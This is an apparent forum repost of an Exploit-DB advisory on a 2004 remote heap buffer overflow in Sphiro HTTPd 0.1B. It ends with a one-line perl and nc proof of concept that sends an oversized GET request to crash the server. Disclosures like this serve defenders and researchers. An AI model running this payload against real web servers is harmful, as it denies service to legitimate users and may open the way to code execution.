Exploit Rosiello Security Sphiro HTTPd 0.1B - Remote Heap Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24070
Проверка EDB
  1. Пройдено
Автор
SLOTTO CORLEONE
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
null
Дата публикации
2004-04-30
Код:
source: https://www.securityfocus.com/bid/10249/info

It has been reported that Sphiro HTTPD is prone to a remote heap based buffer overflow vulnerability. This issue is due to a failure of the application to properly verify buffer boundaries before storing input in fixed buffers.

Immediate consequences of this attack may cause the affected daemon to crash, denying service to legitimate users. Furthermore, due to the nature this issue, arbitrary code execution may be possible. This would occur in the context running daemon process.

perl -e 'print "GET HTTP/1.1" . "A"x1000 . "\n\n"' |nc www.example.com 80
 
Источник
www.exploit-db.com

Похожие темы